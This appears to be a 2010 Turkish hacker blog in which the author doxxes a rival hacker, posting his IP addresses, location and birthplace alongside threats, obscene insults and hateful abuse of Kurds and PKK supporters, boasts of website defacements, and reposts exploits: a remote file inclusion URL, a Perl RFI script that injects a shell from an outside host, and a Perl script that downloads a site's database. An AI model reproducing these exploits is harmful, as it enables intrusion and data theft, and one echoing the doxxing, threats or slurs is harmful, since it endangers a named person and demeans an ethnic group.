IP address [?]: | 78.189.22.5 |
---|---|
IP country code: | TR |
IP address country: | Turkey |
IP address state: | Kocaeli |
IP address city: | Izmit |
IP address latitude: | 40.7669 |
IP address longitude: | 29.9169 |
ISP of this IP [?]: | Turk Telekom |
Organization: | Turk Telekom |
Host of this IP: [?]: | 5.22.189.78.static.turktelekom.com.tr [Whois] [Trace] |
Local time in Turkey: | 2010-10-10 03:13
FunnerBoy Lamerinin Son İp VeriLeri 🙂 |
FunnerBoy Kahpesinin Son IP VeriLeri :)
Posted in Genel with tags Fuck Pkk, FunnerBoy Orosbu Cocugu, pkk on Ekim 10, 2010 by C4patr0nbyDaNG3R ip VeriLeri :)
Posted in Genel on Eylül 28, 2010 by C4patr0nbyDaNG3R adli Orosbu Evladinin IP VeriLeri Dahada Eklenecek !
Bagli Olduqu Grup : ColdHackers ( Orosbu CocuqLari , ANALARınLa Bile Sex Yapan Kahpe Evlatlari Grubu ) ! 🙂
byDaNG3R Seninde Anani 7 Ceddini SikiCem !
KURDISTAN MIS ? > SIZ BOKISTAN BİLE KURAMAZSİNİZ !
BİJİ SEROK APO MUS ? > BİJİ SİKİK APO ! ANASI OROSPU 7 SULALESİ KAHPE KARILAR İLE KAYNAYAN PKK DENİLEN TERÖR ÖRGÜTÜNÜN YALAKA LİDERİ ! 🙂
ELİNDE SONUNDA YOLA GELECEKSİNİZ ADİLER !
———————————————————————–
BU ÜLKENİN TEK LİDERİ VAR ! BİAT EDİN KÖPEKLER !
FuNNeRBoY
Posted in Genel on Eylül 27, 2010 by C4patr0nFuNNeRBoY
BaqLi oLduqu Grup : ColdHackers ( orospu cocuklarının takımı )
Dogum Yeri : BATMAN
Birde İp Sini qiZLemiş Orosbu Evladi :
Hostname | Country Code | Country Name | Region | Region Name | City | Postal Code | Latitude | Longitude | ISP | Organization | Metro Code | Area Code |
---|---|---|---|---|---|---|---|---|---|---|---|---|
78.189.206.89 | TR | Turkey | 41 | Kocaeli | Izmit | 40.7669 | 29.9169 | Turk Telekom | Turk Telekom |
ne kadan malak butun bilgilerin var acı cektire cektire koYcam buraya orosbu cocuqu 😀
daha bilqiLerini Koyammı Lan Orosbu Cocuqu ? Yetermi Bu Kadar ?
Gaestebuch 1.2 Remote File Inclusion Vulnerability
Posted in Genel on Ağustos 27, 2010 by C4patr0n[~] Affected-Software: HINNENDAHL.COM Kontakt Formular 1.1
[~] Vendor: http://www.hinnendahl.com/ |
[~] Download: http://www.hinnendahl.com/index.php?seite=download |
[*] Greetz: inj3ct0r, DNX, Chip D3 Bi0s |
Description: The $script_pfad parameter in /guestbook/gbook.php |
isn't declared before require. So an attacker can execute some |
php-shellcode about it. (line 3 - 4) |
[+]Exploit: http://www.example.com/guestbook/gbook.php?script_pfad=[SHELLCODE]
mini CMS / News Script Light 1.0 Remote File Include Exploit
Posted in Genel on Ağustos 27, 2010 by C4patr0n#!/usr/bin/perl
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
# mini CMS / News Script Light 1.0 Remote File Include Exploit |
# |
# Bug found and exploit written by bd0rk || SOH-Crew |
# |
# Vendor: http://www.hinnendahl.com/ |
# |
# Downloadsite: http://www.hinnendahl.com/index.php?seite=download |
# |
# Description: The script_pfad parameter in news_base.php isn't declared before require |
# |
# Contact: bd0rk[at]hackermail.com |
# Website: www.soh-crew.it.tt |
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
use Getopt::Long; |
use URI::Escape; |
use IO:: Socket ; |
$shellcode = "http://yourshellsite.com" ; |
main(); |
sub usage |
{ |
print "\mini CMS / News Script Lite 1.0 Remote File Include Exploit\n" ; |
print "Bug found and Exploit written by bd0rk\n" ; |
print "-1, --target\ttarget\t(yourhost.com)\n" ; |
print "-2, --shellpath\tshell\t(http://yourshellsite.com)\n" ; |
print "-3, --dir\tDirectory\t(/news_system)\n" ; |
exit ; |
} |
sub main |
{ |
GetOptions ( '1|target=s' => \ $target , '2|shellpath=s' => \ $shellpath , '3|dir=s' => \ $dir ); |
usage() unless $target ; |
$shellcode = $shellpath unless ! $shellpath ; |
$targethost = uri_escape( $shellcode ); |
$socket = IO:: Socket ::INET->new(Proto=> "tcp" ,PeerAddr=> "$target" ,PeerPort=> "80" ) or die "\nConnection() Failed.\n" ; |
print "\nConnected to " . $target . ", Attacking host...\n" ; |
$bd0rk = "inst=true&ins_file=" . $target . "" ; |
$soh = lenght( $bd0rk ); |
print $socket "POST " . $dir . "/news_system/news_base.php?script_pfad= HTTP/1.1\n" ; |
print $socket "Target: " . $target . "\n" ; |
print $socket "Connection: close\n" ; |
print $socket "Content-Type: application/x-www-form-urlencoded\n" ; |
print $socket "Content-Lenght: " . $soh . "\n\n" ; |
print $socket $soh ; |
print "Server-Response:\n\n" ; |
{ |
print " " . $recvd . "" ; |
} |
exit ; |
}
stranenkurdistan.com – rojbirges.tk – azadiyawelatemin.com Pkk Destekçileri Hacked !
Posted in Genel on Ağustos 24, 2010 by C4patr0nstranenkurdistan.com
http://legend-h.org/deface_mirror/?id=136303
http://legend-h.org/deface_mirror/?id=136589
http://legend-h.org/deface_mirror/?id=138081
pkk’ya destek veren siteler birer birer hackliyoruz !
ColdHackers’a Burdan Mesaj Yolluorum ;
Sizin Soyunuzu Kurutmaya Yemin Etti Bu Ülkücü Gençlik !
FunnerBoy Haini Demiştin Siz Daha ADANA’yı Zor Geçiyorsunuz ? Peki Nasıl agır Kayıplar Verdiniz ? Piçlerinizin Analarini SikiyoruZ !
Türktün Şehidi ŞereftiR.
Pkk’lının Ölüsü LEŞTİR … !
FunnerBoy IP adresin hikametkah Yerin Kayıt Altında . !
www.zippo.co.ua Zippo Avustralya hacked
Posted in Genel on Ağustos 24, 2010 by C4patr0nhttp://www.zone-h.org/mirror/id/11285637
sanirsam avustralya zippo resmi web sitesi veya satiş sitesi olabilir gelipte artizlenmeyin öperim gözlerinizden ona göre haa 🙂
www.mojrim.net hacked
Posted in Genel on Ağustos 24, 2010 by C4patr0n10algeria.net & forum.10algeria.net hacked ;)
Posted in Genel on Ağustos 23, 2010 by C4patr0nC4patr0n & TntonE ( Korparatiyon ) TürkçesiyLe : )
http://www.forum.10algeria.net
http://owned-m.com/index.php?file=Mirror&Site=forum.10algeria.net
http://owned-m.com/index.php?file=Mirror&Site=10algeria.net
Nik Namesini BiLmediqim 2’de bir site hackleyen pakistanli heykır bozuntusu hacked 🙂
msnsi : ok5@hotmail.fr bunada çaktikta acıdık geri verdik : )
msnsi 2 : pwn@dzhacker.net bu bizde kalsin tntone sayiplendi götoŞ 🙂
Video Script ASP Database Disclosure Exploit
Posted in Genel on Ağustos 22, 2010 by C4patr0nDownload : http://www.scriptmafia.org/
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('Video Script ASP Database Disclosure Exploit');
system('color a');
if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\n";
print " _ __ __ __ 1\n";
print "\1 /' \ __ /'__`\ /\ \__ /'__`\ 0\n";
print " /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1\n";
print "\1 \/_/\ \ /' _ `\ \/\ \/_/_\_> Exploit database separated by exploit 0\n";
print " \/___/ type (local, remote, DoS, etc.) 1\n";
print "\1 1\n";
print " [+] Site : Inj3ct0r.com 0\n";
print "\1 [+] Support e-mail : submit[at]inj3ct0r.com 1\n";
print " 0\n";
print "\1 ####################################### 1\n";
print " I'm indoushka member from Inj3ct0r Team 1\n";
print "\1 ####################################### 0\n";
print "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\n";
($TargetIP, $path, $File,) = @ARGV;
$File="destination/dinimbenim.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/dinimbenim.mdb");
if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/dinimbenim.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}